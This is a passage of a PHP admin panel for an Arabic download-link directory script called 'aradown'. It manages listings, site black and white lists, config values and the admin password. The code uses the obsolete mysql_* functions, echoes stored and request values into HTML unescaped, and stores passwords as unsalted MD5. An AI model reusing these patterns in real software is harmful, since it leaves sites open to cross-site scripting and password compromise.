				echo '<tr><td>'.$row['type'].'</td><td><a href="'.$row['url'].'" target="_blank">'.$row['title'].'</a></td><td><input type="checkbox" name="ed[]" value="'.$row['id'].'"></td></tr>';

			}

		echo '<tr><td colspan="3">';

		echo $this->paginator("index.php?go=downloads&page=#i#",$this->page,$max);

		echo ' of <strong>'.$max.' Pages</strong>';

		echo '<tr><td colspan="3" align="right"><input id="submitconf" type="submit" name="esub" value="تعديل المحدد"><input id="submitconf" type="submit" name="dsub" value="حذف المحدد"></td></tr>

		</td></tr>

		</table></form><br><br>

		<form  action="" method="post"><table width="100%">

		<tr><td id="headads" align="center" colspan="2">اضافة موضوع</td></tr>

		<tr><td align="center">الموقع <select name="add_site">';

		$sites = mysql_query("SELECT id,url FROM aradown_sites");

			while($site = mysql_fetch_assoc($sites)) {

				$site = $this->mapit($site,array("stripslashes","strip_tags"));

				echo '<option value="'.$site['id'].'">'.$site['url'].'</option>';

			}

		echo '</select></td></tr>

		<tr><td align="center">عنوان الموضوع <input size="60" type="text" name="add_title"></td></tr>

		<tr><td align="center">النوع <select name="add_type">';

			foreach($this->allowed_types as $at) {

				echo '<option value="'.$at.'">'.$at.'</option>';

			}

		echo '</select></td></tr>

		<tr><td align="center">رابط الموضوع <input size="60" type="text" name="add_url"></td></tr>

		<tr><td colspan="2" align="center"><input id="submitconf" type="submit" value="أضف الموضوع" name="add_sub"></td></tr>

		</table></form>';

	}



	protected function admin_blacklist() {

		if(isset($_POST['bwurl']))

			$bwurl = $_POST['bwurl'];

		if(isset($_POST['bwsub']))

			$bwsub = $_POST['bwsub'];

		if(isset($_POST['remove']))

			$remove = $_POST['remove'];

		if(isset($bwsub)) {

			if(isset($bwurl)) {

			@mysql_query("INSERT INTO aradown_".mysql_real_escape_string($this->blackorwhite)."list VALUES ('".mysql_real_escape_string($bwurl)."')");

				if($this->blackorwhite == "black") {

				$sid = @mysql_query("SELECT id FROM aradown_sites WHERE url = '".mysql_real_escape_string($bwurl)."'");

					if(mysql_num_rows($sid)) {

						$sid = @mysql_result($sid,0);

						@mysql_query("DELETE FROM aradown_downloads WHERE sid = '".mysql_real_escape_string($sid)."'");

					}

				echo 'تم حظر هذا الموقع وحذف كل المواضيع الخاصة به';

						

				} elseif($this->blackorwhite == "white") {

				echo 'تم رفع الحظر عن الموقع بنجاح';

				}

			}

			if(isset($remove)) {

				$fishpan = 0;

				foreach($remove as $url) {

					mysql_query("DELETE FROM aradown_".mysql_real_escape_string($this->blackorwhite)."list WHERE url = '".mysql_real_escape_string($url)."'");

					$fishpan++;

				}

				echo $fishpan.' تم حذف المواقع من '.$this->blackorwhite.'list.';

			}

		}

		echo '<form action="" method="post"><table width="100%">

		<tr><td>الموقع</td><td align="right">حذف</td></tr>';

		$get = mysql_query("SELECT url FROM aradown_".mysql_real_escape_string($this->blackorwhite)."list");

		while($row = mysql_fetch_assoc($get)) {

			echo '<tr><td><a href="http://'.$row['url'].'" target="_blank">'.$row['url'].'</a></td><td align="right"><input type="checkbox" name="remove[]" value="'.$row['url'].'"></td></tr>';

		}

		echo '<tr><td colspan="2" align="right"><input id="submitconf" type="submit" value="حذف المحدد ورفع الحظر" name="bwsub"></td></tr>

		</table></form><br>

		<form action="" method="post"><table width="100%">

		<tr><td align="center">'.ucfirst($this->blackorwhite).'list an URL</td></tr>

		<tr><td style=" direction:ltr;" align="center">WWW., HTTP:// لا تقم باضافة<br> advphp.com مثال<br><input type="text" name="bwurl"></td></tr>
 

		<tr><td align="center"><input type="submit" value="'.ucfirst($this->blackorwhite).'list" name="bwsub"></td></tr></table></form>';

	}



	protected function admin_whitelist() {

		$this->admin_blacklist();

	}



	protected function admin_update() {

		echo 'النسخة الحالية: '.$this->version.'<br /><br />';
          //http://warezcoders.com/wcddl_latest.txt
		$latest = @file_get_contents("http://aradown.info/latest_version.txt");

		echo 'اخر اصدار: '.(!empty($latest) ? $latest : 'Unknown').'<br /><br />';

		if($this->version != $latest) {

			echo 'نسختك الحالية ليست الأحدث, <a id="submitconf" href="http://aradown.info">حدث من هنا</a>';

		}

	}



	protected function admin_addcfg() {

		if(isset($_POST['cfgname'],$_POST['cfgvalue'],$_POST['cfggroup'])) {

			$name = $_POST['cfgname'];

			$val = $_POST['cfgvalue'];

			$group = $_POST['cfggroup'];

		}

		if(isset($name) && isset($val) && isset($group)) {

			$this->changeCFG($name,$val,$group);

			echo 'Setting Added/Changed!';

		}

		echo '<form action="" method="post"><table width="100%">

		<tr><td class="currentpage" style="color:#fff;" colspan="2">اضافة خيار كونفج</td></tr>

		<tr><td colspan="2">ملاحظه:اذا تم اضافة خيار مكتوب مسبقا,سوف يتم الكتابة عليه</td></tr>

		<tr><td>الاسم:</td><td><input type="text" name="cfgname"></td></tr>

		<tr><td>المجموعة:</td><td><input type="text" name="cfggroup" value="misc"></td></tr>

		<tr><td>القيمة:</td><td><textarea cols="30" rows="5" name="cfgvalue"></textarea></td></tr>

		<tr><td>&nbsp;</td><td><input id="submitconf" type="submit" value="اضف الخيار"></td></tr>

		</table></form>';

	}



	protected function admin_manage_config() {

		if(isset($_POST['group']))

			$group = $_POST['group'];

		if(isset($_REQUEST['cfgid']))

			$cfg_id = $_REQUEST['cfgid'];

		if(!isset($group) && !isset($cfg_id)) {

			echo '<form action="" method="post"><table width="100%">

			<tr><td colspan="2">Select a Config Group</td></tr>

			<tr><td>Group:</td><td><select name="group">';

			$groups = mysql_query("SELECT DISTINCT config_group FROM aradown_config");

			while($group_name = mysql_fetch_row($groups))

				echo '<option value="'.$group_name[0].'">'.$group_name[0].'</option>';

			echo '</select></td></tr>

			<tr><td colspan="2"><input type="submit" value="Select"></td></tr>

			</table></form>';

		} elseif(isset($group)) {

			echo '<form action="" method="post"><table width="100%">

			<tr><td colspan="2">Select a Configuration</td></tr>

			<tr><td>Config:</td><td><select name="cfgid">';

			$cfgs = mysql_query("SELECT config_name FROM aradown_config WHERE config_group = '".mysql_real_escape_string($group)."'");

			while($cfg_name = mysql_fetch_row($cfgs))

				echo '<option value="'.$cfg_name[0].'">'.$cfg_name[0].'</option>';

			echo '</select></td></tr>

			<tr><td colspan="2"><input type="submit" value="Edit"></td></tr>

			</table></form>';

		} elseif(isset($cfg_id)) {

			if(isset($_POST['newval']))

				$newval = $_POST['newval'];

			if(!isset($newval)) {

				$val = $this->fetchCFG($cfg_id);

				echo '<form action="?go=manage_config&cfgid='.$cfg_id.'" method="post"><table width="100%">

				<tr><td colspan="2">Enter a new value</td></tr>

				<tr><td>Value:</td><td><input type="text" name="newval" value="'.$val.'"></td></tr>

				<tr><td colspan="2"><input type="submit" value="Save"></td></tr>

				</table></form>';

			} else {

				$this->changeCFG($cfg_id,$newval);

				echo 'Configuration Set.';

			}

		}

	}



	protected function admin_list_mods() {

		echo '<table width="100%">';

		if($dir = opendir($this->sitepath."/modules/")) {

			while(($file = readdir($dir)) !== false) {

				if(substr($file,0,8) == "aradown_") {

					echo '<tr><td>'.$file.'</td><td>';

					$filecontents = file_get_contents($this->sitepath."/modules/".$file);

					if(preg_match_all("/\/\*BEGIN_INFO([\s\S]*?)END_INFO\*\//",$filecontents,$info))

						echo nl2br(trim(strip_tags($info[1][0])));

					else

						echo 'لا توجد معلومات متوافره';

					echo '</td></tr>';

				}

			}

			closedir($dir);

		}

		echo '</table>';

	}
	
	
	public function use_love(){
		
		$sql=mysql_query("select * from aradown_downloads ORDER BY id DESC LIMIT ".$this->pg.",".$this->limit."");

while($row=mysql_fetch_array($sql))
{

$down_id=$row['id'];
$love=$row['love'];

?>


<tr class="lovetr">
<td class="lovetr">
<a href="#" class="love" id="<?php echo $down_id; ?>">
<span class="on_img" align="left"> <?php echo $love; ?> </span> 
</a>

</td>
</td>
<?
}
		
}










public function admin_admin_details(){
	
	echo '<div id="headads">تغيير باسورد الأدمن</div>';
	$pass=mysql_real_escape_string(md5($_POST['pass']));
	$newpass=mysql_real_escape_string(md5($_POST['newpass']));
	$confirmpass=mysql_real_escape_string(md5($_POST['confirmpass']));
	$sql=mysql_query("select password from aradown_admin where password='$pass'");
	if($_POST['submit']){
	
	if(empty($pass) || empty($newpass) ){
echo '<span style="float:left;color:#fff;background:#f00;padding:7px;">يوجد حقل فارغ</span>';
	}
		
	if(mysql_num_rows($sql)==1){
		
		if($newpass==$confirmpass){
			mysql_query("update aradown_admin set password='$newpass'");
	
	echo '<meta http-equiv="refresh" content="1; url=index.php?go=admin_details">'; 
	echo '<span style="float:left;color:#000000;background:#3C0;padding:7px;">تم تحديث كلمة السر</span>';
			}
		else
			{
				echo '<span style="float:left;color:#000;background:#f00;padding:7px;">كلمة السر الجديدة غير متطابقة مع كلمة السر المؤكدة</span>';
				
				}
		}
		else 
		{
			echo '<span style="float:left;color:#fff;background:#f00;padding:7px;">كلمة السر الحالية غير صحيحة</span>';
			}
	}
	
	?>
    <form action="" method="post">
    <p>ادخل كلمة المرور الحالية </p>
    <p><input id="inputcss" type="password" name="pass" /></p>
    <p>كلمة المرور الجديدة</p>
    <p><input type="password" name="newpass" /></p>
    <p>تأكيد كلمة المرور الجديدة</p>
    <p><input type="password" name="confirmpass" /></p>
    <p><input id="submitconf" type="submit" name="submit" value="تنفيذ" /></p>
    </form>
    
    <?
	
	}

	

}

?>



